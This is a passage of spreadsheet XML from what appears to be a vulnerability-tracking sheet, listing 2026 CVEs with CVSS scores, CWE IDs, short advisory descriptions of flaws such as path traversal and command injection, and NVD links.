        </is>
      </c>
      <c r="H1559" s="5" t="inlineStr"/>
      <c r="I1559" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1559" s="5" t="inlineStr"/>
      <c r="K1559" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1559"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M1559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81207</t>
        </is>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81302</t>
        </is>
      </c>
      <c r="C1560" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1560" s="5" t="inlineStr"/>
      <c r="F1560" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1560" s="5" t="inlineStr"/>
      <c r="H1560" s="5" t="inlineStr"/>
      <c r="I1560" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1560" s="5" t="inlineStr"/>
      <c r="K1560" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1560" s="5" t="inlineStr">
        <is>
          <t>PALLET CONTROL products contain an incorrect default permission vulnerability, which may allow a local attacker to execute arbitrary code with SYSTEM privileges on the affected product.</t>
        </is>
      </c>
      <c r="M1560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81302</t>
        </is>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81540</t>
        </is>
      </c>
      <c r="C1561" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1561" s="5" t="inlineStr"/>
      <c r="F1561" s="5" t="inlineStr"/>
      <c r="G1561" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1561" s="5" t="inlineStr"/>
      <c r="I1561" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1561" s="5" t="inlineStr"/>
      <c r="K1561" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1561" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to overwrite ruleset files belonging to other tenants due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81540</t>
        </is>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82474</t>
        </is>
      </c>
      <c r="C1562" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1562" s="5" t="inlineStr"/>
      <c r="F1562" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1562" s="5" t="inlineStr"/>
      <c r="H1562" s="5" t="inlineStr"/>
      <c r="I1562" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1562" s="5" t="inlineStr"/>
      <c r="K1562" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1562" s="5" t="inlineStr">
        <is>
          <t>Sudo through 1.9.17p2 fails to apply intercept policy checks to the execveat system call in ptrace-based intercept mode. Users permitted to run specific commands can execute denied programs by calling execveat directly or through fexecve, bypassing policy enforcement and logging.</t>
        </is>
      </c>
      <c r="M1562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82474</t>
        </is>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84063</t>
        </is>
      </c>
      <c r="C1563" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1563" s="5" t="inlineStr"/>
      <c r="F1563" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1563" s="5" t="inlineStr"/>
      <c r="H1563" s="5" t="inlineStr"/>
      <c r="I1563" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1563" s="5" t="inlineStr"/>
      <c r="K1563" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1563" s="5" t="inlineStr">
        <is>
          <t>BurgerEditor 3.2.0 through 3.4.0 contains an issue with unrestricted upload of file with dangerous type. If this vulnerability is exploited, an arbitrary file may be uploaded by an attacker who can log in to the product, potentially allowing arbitrary PHP code to be executed may be caused.</t>
        </is>
      </c>
      <c r="M1563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84063</t>
        </is>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84226</t>
        </is>
      </c>
      <c r="C1564" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1564" s="5" t="inlineStr"/>
      <c r="F1564" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1564" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1564" s="5" t="inlineStr"/>
      <c r="I1564" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1564" s="5" t="inlineStr"/>
      <c r="K1564" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1564" s="5" t="inlineStr">
        <is>
          <t>OpenVPN version 2.5.0 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows local authenticated users to perform a binary planting attack during network configuration steps</t>
        </is>
      </c>
      <c r="M1564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84226</t>
        </is>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85012</t>
        </is>
      </c>
      <c r="C1565" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1565" s="5" t="inlineStr"/>
      <c r="F1565" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1565" s="5" t="inlineStr"/>
      <c r="H1565" s="5" t="inlineStr"/>
      <c r="I1565" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1565" s="5" t="inlineStr"/>
      <c r="K1565" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1565" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command (CWE-78) in the blueprint resynthesis framework in Amazon Web Services codecatalyst-blueprints before 0.3.156 might allow a user with permission to commit to a repository in the project to execute arbitrary commands in the blueprint resynthesis environment via shell metacharacters in the owner field of a [local] merge strategy entry in a crafted .ownership-file.
Version 0.3.156 removes shell interpretation of the owner field, running the command directly rather than through a shell, and rejects values outside an allowlisted command form. This eliminates shell metacharacter command injection. To remediate this issue, users should upgrade to version 0.3.156 or later.
No action is required for use of the Amazon CodeCatalyst service. Resynthesis runs in an isolated per-project environment with scoped credentials, and the service applies server-side validation there that rejects [local] merge strategy commands outside a restricted allowlisted form, including for blueprint versions published before 0.3.156.</t>
        </is>
      </c>
      <c r="M1565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85012</t>
        </is>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85384</t>
        </is>
      </c>
      <c r="C1566" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1566" s="5" t="inlineStr"/>
      <c r="F1566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1566" s="5" t="inlineStr"/>
      <c r="H1566" s="5" t="inlineStr"/>
      <c r="I1566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1566" s="5" t="inlineStr"/>
      <c r="K1566" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1566" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the httpd component of RE210 AC750 due to improper bounds checking in the splitString function when processing an uploaded configuration file. An authenticated attacker on the local network can upload a crafted configuration file to trigger the overflow, leading to remote code execution.
Successful exploitation may allow unauthorized access to sensitive information, modification of device configuration and network behavior, or disruption of device availability.</t>
        </is>
      </c>
      <c r="M1566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t>
        </is>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85439</t>
        </is>
      </c>
      <c r="C1567" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1567" s="5" t="inlineStr"/>
      <c r="F1567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1567" s="5" t="inlineStr"/>
      <c r="H1567" s="5" t="inlineStr"/>
      <c r="I1567" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1567" s="5" t="inlineStr"/>
      <c r="K1567" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1567" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a remote code execution vulnerability in alogsplit's SplitHandler::handlePreCheckSplitDir() function that fails to sanitize shell metacharacters in log file pathnames. Attackers can embed shell syntax in log file names or the --dir parameter to execute arbitrary commands with the privileges of the operator running alogsplit.</t>
        </is>
      </c>
      <c r="M1567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85439</t>
        </is>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85656</t>
        </is>
      </c>
      <c r="C1568" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1568" s="5" t="inlineStr"/>
      <c r="F1568" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1568" s="5" t="inlineStr">
        <is>
          <t>java, log4j</t>
        </is>
      </c>
      <c r="H1568" s="5" t="inlineStr"/>
      <c r="I1568" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1568" s="5" t="inlineStr"/>
      <c r="K1568" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1568" s="5" t="inlineStr">
        <is>
          <t>An OS command injection issue in the log4j-cve-2021-44228-hotpatch package in Amazon Linux before 1.3-9 might allow a local user to execute arbitrary commands with root privileges via a Java process whose executable path contains embedded newline characters.</t>
        </is>
      </c>
      <c r="M1568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t>
        </is>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85674</t>
        </is>
      </c>
      <c r="C1569" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1569" s="5" t="inlineStr"/>
      <c r="F1569" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1569" s="5" t="inlineStr"/>
      <c r="H1569" s="5" t="inlineStr"/>
      <c r="I1569" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1569" s="5" t="inlineStr"/>
      <c r="K1569" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1569" s="5" t="inlineStr">
        <is>
          <t>aider (aider-chat) automatically loads a .aider.conf.yml configuration file from the root of the git repository it is launched in. A crafted repository can set test-cmd (executed at startup) or lint-cmd (executed on the first file edit), which aider runs through a shell (subprocess with shell=True) without any user confirmation, LLM interaction, or API key. Consequently, a user who clones and runs aider inside an attacker-supplied repository achieves arbitrary command execution on their machine. The behavior is long-standing and was confirmed on 0.86.3.dev (current main).</t>
        </is>
      </c>
      <c r="M1569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85674</t>
        </is>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86095</t>
        </is>
      </c>
      <c r="C1570" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1570" s="5" t="inlineStr"/>
      <c r="F1570" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1570" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1570" s="5" t="inlineStr"/>
      <c r="I1570" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1570" s="5" t="inlineStr"/>
      <c r="K1570" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1570" s="5" t="inlineStr">
        <is>
          <t>Unidata netcdf-c through 4.10.1 contains an out-of-bounds write vulnerability in NC4_HDF5_inq_attname() that copies HDF5 attribute names into a fixed 256-byte buffer without length validation. Attackers can craft HDF5 files with oversized attribute names to overflow the destination buffer, causing memory corruption and crashes when applications enumerate attribute names.</t>
        </is>
      </c>
      <c r="M1570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86095</t>
        </is>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86492</t>
        </is>
      </c>
      <c r="C1571" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1571" s="5" t="inlineStr"/>
      <c r="F1571" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1571" s="5" t="inlineStr"/>
      <c r="H1571" s="5" t="inlineStr"/>
      <c r="I1571" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1571" s="5" t="inlineStr"/>
      <c r="K1571" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L1571" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 a shared token cache allowed cross-tenant theft of GitHub App installation tokens</t>
        </is>
      </c>
      <c r="M1571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86492</t>
        </is>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86540</t>
        </is>
      </c>
      <c r="C1572" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1572" s="5" t="inlineStr"/>
      <c r="F1572" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1572" s="5" t="inlineStr"/>
      <c r="H1572" s="5" t="inlineStr"/>
      <c r="I1572" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1572" s="5" t="inlineStr"/>
      <c r="K1572" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1572" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 fail to validate the settings.lsp.languages binary field in project configuration files, allowing attackers to execute arbitrary binaries by crafting a malicious .knowns/config.json file. When a repository with a crafted configuration is opened, the unvalidated binary path is executed twice under the user's account without any verification.</t>
        </is>
      </c>
      <c r="M1572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86540</t>
        </is>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="C1573" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1573" s="5" t="inlineStr"/>
      <c r="F1573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1573" s="5" t="inlineStr"/>
      <c r="H1573" s="5" t="inlineStr"/>
      <c r="I1573" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1573" s="5" t="inlineStr"/>
      <c r="K1573" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1573" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="M1573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="C1574" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1574" s="5" t="inlineStr"/>
      <c r="F1574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1574" s="5" t="inlineStr"/>
      <c r="H1574" s="5" t="inlineStr"/>
      <c r="I1574" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1574" s="5" t="inlineStr"/>
      <c r="K1574" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1574" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="C1575" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1575" s="5" t="inlineStr"/>
      <c r="F1575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1575" s="5" t="inlineStr"/>
      <c r="H1575" s="5" t="inlineStr"/>
      <c r="I1575" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1575" s="5" t="inlineStr"/>
      <c r="K1575" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1575" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88886</t>
        </is>
      </c>
      <c r="C1576" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1576" s="5" t="inlineStr"/>
      <c r="F1576" s="5" t="inlineStr"/>
      <c r="G1576" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1576" s="5" t="inlineStr"/>
      <c r="I1576" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1576" s="5" t="inlineStr"/>
      <c r="K1576" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1576"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M1576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88886</t>
        </is>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88889</t>
        </is>
      </c>
      <c r="C1577" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1577" s="5" t="inlineStr"/>
      <c r="F1577" s="5" t="inlineStr"/>
      <c r="G1577" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1577" s="5" t="inlineStr"/>
      <c r="I1577" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1577" s="5" t="inlineStr"/>
      <c r="K1577" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1577" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Maven Wrapper manager that allows attackers to execute arbitrary commands by specifying a malicious distributionType parameter in maven-wrapper.properties. Attackers can inject shell commands through unescaped distributionType values to achieve remote code execution when Renovate processes Maven Wrapper updates in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M1577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88889</t>
        </is>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89049</t>
        </is>
      </c>
      <c r="C1578" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1578" s="5" t="inlineStr"/>
      <c r="F1578" s="5" t="inlineStr"/>
      <c r="G1578" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1578" s="5" t="inlineStr"/>
      <c r="I1578" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1578" s="5" t="inlineStr"/>
      <c r="K1578" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-918</t>
        </is>
      </c>
      <c r="L1578" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery issue due to improper validation of equivalent address representations in the port forwarding to remote hosts functionality in Amazon AWS Systems Manager Agent (SSM Agent) before 3.3.4851.0 on all platforms might allow an authenticated remote user to bypass the remote destination denylist and reach link-local endpoints, potentially obtaining the temporary IAM role credentials of a managed instance and acting with that role's permissions from outside the instance, via a crafted destination host value that uses an alternate representation of a denied link-local address.
To remediate this issue, users should upgrade to version 3.3.4851.0 or later.</t>
        </is>
      </c>
      <c r="M1578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89049</t>
        </is>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9853</t>
        </is>
      </c>
      <c r="C1579" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1579" s="5" t="inlineStr"/>
      <c r="F1579" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1579" s="5" t="inlineStr"/>
      <c r="H1579" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I1579" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1579" s="5" t="inlineStr"/>
      <c r="K1579" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L1579" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 which allows any user authenticated to the operating system of the server hosting the application to read and modify application objects without being authenticated to the SYS600 system itself.
Only the SYS600 system users should be permitted to view and modify application objects.</t>
        </is>
      </c>
      <c r="M1579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9853</t>
        </is>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9854</t>
        </is>
      </c>
      <c r="C1580" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1580" s="5" t="inlineStr"/>
      <c r="F1580" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1580" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1580" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I1580" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1580" s="5" t="inlineStr"/>
      <c r="K1580" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L1580" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 RBAC mechanism where users having access to the engineering tools could elevate their privileges to administrator level on the underlying Windows host, granting themselves full control over the host machine.</t>
        </is>
      </c>
      <c r="M1580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9854</t>
        </is>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1581" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-12737</t>
        </is>
      </c>
      <c r="C1581" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1581" s="5" t="inlineStr"/>
      <c r="F1581" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1581" s="5" t="inlineStr"/>
      <c r="H1581" s="5" t="inlineStr">
        <is>
          <t>wso2:api_control_plane, wso2:api_manager, wso2:identity_server, wso2:identity_server_as_key_manager, wso2:open_banking_am, wso2:open_banking_iam, wso2:traffic_manager, wso2:universal_gateway</t>
        </is>
      </c>
      <c r="I1581" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1581" s="5" t="inlineStr"/>
      <c r="K1581" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1581" s="5" t="inlineStr">
        <is>
          <t>The administrative operations within the Carbon Console do not adequately validate specific user-supplied input. This oversight allows a malicious actor with administrative privileges to inject and execute arbitrary code remotely.
Successful exploitation enables a threat actor with administrative privileges and Carbon Console access to execute remote arbitrary code through specific administrative operations, leading to a complete compromise of the affected system.</t>
        </is>
